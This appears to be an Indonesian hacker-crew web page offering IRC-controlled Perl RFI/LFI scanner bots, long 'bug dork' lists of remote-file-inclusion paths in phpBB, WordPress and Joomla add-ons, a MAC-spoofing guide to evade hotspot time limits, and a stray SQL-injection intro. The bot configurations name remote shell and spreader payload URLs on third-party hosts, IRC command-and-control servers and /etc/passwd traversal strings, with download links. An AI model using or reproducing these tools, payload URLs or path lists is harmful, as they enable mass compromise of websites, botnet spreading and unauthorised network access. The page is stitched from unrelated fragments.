use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = "http://www.urisan.tche.br/usill-id.txt?";
my $shell = "[kill-9]";
my $spread = "http://www.urisan.tche.br/bajo-spread.txt?";
my $spreads = "http://www.urisan.tche.br/usil-spreads.txt?";
#my $id = "http://www.urisan.tche.br/usill-id.txt?";
#my $shell = "http://www.urisan.tche.br/sh.txt";
@ircservers = (
"irc.indonesiancoder.us",
#"localhost",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us"
);

my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $chan3 = "#kill-9";
my $c1k = "cerme";
my $c2k = "cerme";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "ScanNeR[".int(rand(1000))."]";
my $ident = "Priv[".int(rand(1000))."]";
my $admin = "arianom";


Download [lengkap + id]

Pittbull Scanner

***************************
AUTORE: Arianom
DATE :April 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl
#
# Release Name : aria[kill-pitbull]
#
# RFi Scanner Christmas Release ! :D
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.

# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.


use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################

my $response = "http://www.emabe.com/administrator/templates/response.txt??"; # included in zip as response.txt
my $test = "http://www.emabe.com/administrator/templates/test.txt??"; # included in zip as test.txt
my $printcmd = "http://www.yourhost.com/sh.txt??";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://yourhost.com/pbotz.txt??";
my $nickname = "ngising|".(int(rand(999)));
my $ident = "RFiBeast";
my $channel = "#kill-9";
my $server = "irc.pengangguran.us.to";
my $port = 6667;

#################
#[Configuration]#
#################


Download [lengkap + id]

SQL Injection Attacks by Example

A customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger security review, and though we'd not actually used SQL injection to penetrate a network before, we were pretty familiar with the general concepts. We were completely successful in this engagement, and wanted to recount the steps taken as an illustration.

"SQL Injection" is subset of the an unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises.

We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided.

There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.

Bug Dork PHPBB

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=

Bug Dork WordPress

index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=

Bajo Sanner

***************************
AUTOR: arianom
DATE :Desember 2009
LINGUAGE: perl (.pl)
**************************

#!/usr/bin/perl
$process = "/usr/sbin/arianom";
my $printcmd = "http://kill-nine.co.nr??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $spreads = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $ircserver = "irc.indonesiancoder.us";
my $start = "!scan";
my $port = "6667";
my $nickname = "sedih" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Pbot RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: Arianom\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [lengkpa + id]

HACK WIFI

Terkadang lagi asik asik ngenet di hotspot tiba2 putus,…katanya sih dibatasi waktu biar user tidak dapat mengakses internet lagi…. Wah wah wah … repot banget sih…hanya ingin mendapatkan informasi di internet…seluruh kegiatan kita dibatasi…edun…alahhhhhhhhhhh … pembatasan diri…makanya kapan rakyat Indonesia bias mendapatkan informasi gratis di internet … kapan seluruh sector internet tidak dijadikan ajang bisnis…ini yang membuat rakyat Indonesia menjadi tidak percaya dengan internet … dan dibodohi oleh bangsa lain… di Negara maju access internet tidak dibatasi dan GRATIS…ya sekali lagi GRATIS … hanya disini saja dijadikan sumber inspirasi bagi para pebisnis agar meraup keuntungan sebanyak –banyaknya … padahal kita orang Indonesia sangat haus ilmu, apalagi soal computer, kapan lagi sih …. Hihihihihi … okay untuk mengatasi ini ada tips dan trick untuk merubah mac agar kita bias bebas berkeliaran di dunia cyber hihihihi…

Okay…. Langsung to the point aja yah…,pertama cari hotspot…kalo bisa menyediakan hotspot gratis…tapi dibatasi oleh jam ajah gituh…, terus maeennnnnnn aja ampe abis waktunya …

nah bis itu bakal ada pembatasan akses seperti yang ditunjukkan gambar di atas .. atau ada tulisan “MAAF WAKTU BERINTERNET ANDA TELAH ABIS, SILAHKAN KEMBALI BESOK”, setannnnnnnn!!!!! kapan indonesia mo maju kalo internet dibatasi terus… yaaaa mo gak mau deh diakalin.

PROSES PEMBATASAN WAKTU

proses pembatasan waktu bisa dibatasi dari access point yang ada di kafe tersebut, dan biasanya pembatasan tersebut menggunakan MAC address, kenapa MAC Address???Kok gak IP Address??umh…kalo IP address bisa diganti sendiri kan lewat komputer, tapi kalau MAC, mungkin bisa di linux, tapi kalo di windows??? ya donlot lah program buat ngerubah MAC di:

klik disini untuk download software TMAC
kemudian install dan jalankan, maka akan muncul seperti gambar berikut:

kemudian klik tombolnya CHANGE MAC untuk mengganti mac address, lalu klik RANDOM MAC ADDRESS,
nah…ntar mac addressnya bakal dirandom sesuai dengan metode yang benar dari programnya, lalu klik CHANGE NOW!, langsung deh IP address anda berubah.

tunggu beberapa saat agar kompie merefresh perubahan ini kemudian buka lagi situs yang ingin dikunjungi, BANG BANG BANG!!!… dapet access 2 jam gratis lagi euy …

bisa dilihat tombol CLICK HERE itu jika ditekan kita mendapat free access, okay … mungkin sekian… dulu darri sayah …

Joomla Bugs

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/components/com_mambowiki/Mam***ogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_madeira/img.php?url=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/components/com_joomlaboard/file_upload.php?sbp=
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
 
KiLL-9 CrEW Copyright © 2009 KiLL-9 CrEw Template Designed by Arianom Founder KilLL-9 CrEw Best Indonesian White Hacker. Allright Reserved.